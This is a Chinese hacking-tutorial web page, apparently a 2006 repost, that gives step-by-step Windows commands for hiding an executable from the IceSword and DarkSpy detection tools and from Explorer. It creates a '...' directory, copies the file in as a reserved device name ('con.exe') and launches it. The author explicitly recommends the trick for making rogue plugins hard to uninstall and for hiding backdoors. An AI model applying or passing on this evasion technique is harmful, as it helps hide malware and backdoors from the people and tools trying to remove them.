放飞你的梦想--翱翔我的天空 | 会员登陆 | 繁體中文 | 站点地图 | 站长博客
 | 网站首页 | 文章中心 | IT 前沿 | 清怡画风 | 视频教程 | 资源下载 | 精彩图库 | 博客文赏 | 天空论坛 | 访客留言 | 音乐版 | 
    本站全新推出IT 前沿频道欢迎大家访问 地址 http://it.tkbbs.com  [风雪残士  2005年12月9日]            本站推出新浪VIVI收藏夹服务,欢迎使用  [风雪残士  2005年10月18日]        
您现在的位置: 翱翔翼站 >> 文章中心 >> 网络世界 >> 黑客攻防 >> 文章正文 今天是:
在 icesword darkspy等入侵检测下隐藏文件的方法 【字体:
作 者:佚名 文章来源:网络 更新:2006-10-4 22:37:32 点击:







mysite : http://blog.csdn.net/freexploit/
team : freexploit
date : 2006-09-29
me : allyesno

测试目录为 G:\test\test>dir

G:\test\test 的目录

2006-05-30 16:43   <DIR>       .
2006-05-30 16:43   <DIR>       ..
2006-05-30 19:47   <DIR>       ..
2003-03-27 20:00       464,896 bac.exe
          1 个文件     464,896 字节
          3 个目录 1,498,521,600 可用字节


看步骤

建立隐藏目录
G:\test\test>md ...\

复制文件
G:\test\test>copy bac.exe \\.\g:\test\test\...\con.exe
已复制       1 个文件。

启动文件
G:\test\test>start \\.\g:\test\test\...\con.exe

检测效果看截图


icesword



darkspy



资源管理器



还有其他一些入侵检测 工具就不一一示范了

allyesno : 另外一些用途 可以用在流氓插件上啊 这样流氓插件就更加难卸载了

还可以用在隐藏后门上面 因为这个方法的特殊性 你就算用另外一个系统 或者 光盘引导

也是无法检测出来的 当然自己写程序是可以 我是说现在一般的 卸载后门 以及 流氓软件的手段

对这个方法都是失效的

注:并不能隐藏该目录下运行的进程 并且这个方法只适用于 FAT32 格式 NTFS似乎不行


文章录入:风雪残士    责任编辑:风雪残士 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    相关文章
    没有相关文章
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    最新文章 TOP10
    最新热门 TOP10
    最新推荐TOP10
    翱翔翼站拥有本站所有版权! Copyright © 2005 - 2008 5-IT.COM
    本站维护 :风雪残士

    浙ICP备05039908号
    努力打造国内最全的电脑技术资料库